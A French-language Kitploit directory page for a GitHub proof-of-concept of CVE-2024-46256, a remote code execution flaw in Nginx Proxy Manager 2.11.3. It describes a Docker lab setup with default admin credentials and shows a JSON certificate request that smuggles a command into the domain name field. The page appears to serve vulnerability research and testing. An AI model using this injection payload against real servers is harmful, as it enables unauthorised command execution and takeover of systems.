Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/kimtangker/cve-2024-46256
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubkimtangker/cve-2024-46256

CVE-2024-46256

CVE-2024-46256 outil

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Analyse de la vulnérabilité RCE CVE-2024-46256 de Nginx Proxy Manager

Mise en place de l'environnement

1. Exécution de l'environnement Nginx Proxy Manager 2.11.3

root@kitploit:~

docker-compose up -d

Ou vous pouvez utiliser le script automatique :

root@kitploit:~

python setup_environment.py

2. Accès à Nginx Proxy Manager

  • URL : http://localhost:81

  • Effectuez les tests après avoir terminé la configuration initiale

  • Connectez-vous avec le compte administrateur par défaut (email : [email protected] / mot de passe : changeme)

  • Vérifiez les droits d'accès aux fonctionnalités liées à l'émission de certificats

Informations sur la vulnérabilité

  • CVE ID : CVE-2024-46256

  • Produit : Nginx Proxy Manager

  • Version : 2.11.3

  • Type de vulnérabilité : Exécution de code à distance (RCE)

  • CVSS : Élevé

Code PoC

Le PoC permet à un utilisateur authentifié de provoquer une RCE en injectant des modèles/commandes dans le champ du nom de domaine lors de la demande d'émission d'un certificat (par exemple, Let's Encrypt).

Exemple de payload (exemple conceptuel) :

root@kitploit:~
{
  "domain_names": ["test.com\"||{command}||\\n test.com\""],
  "meta": {
    "dns_challenge": false,
    "letsencrypt_agree": true,
    "letsencrypt_email": "[email protected]"
  },
  "provider": "letsencrypt"
}

Environnement d'analyse

  • Système d'exploitation : Windows 10

  • Docker : version la plus récente

  • Nginx Proxy Manager : 2.11.3

Télécharger l’outil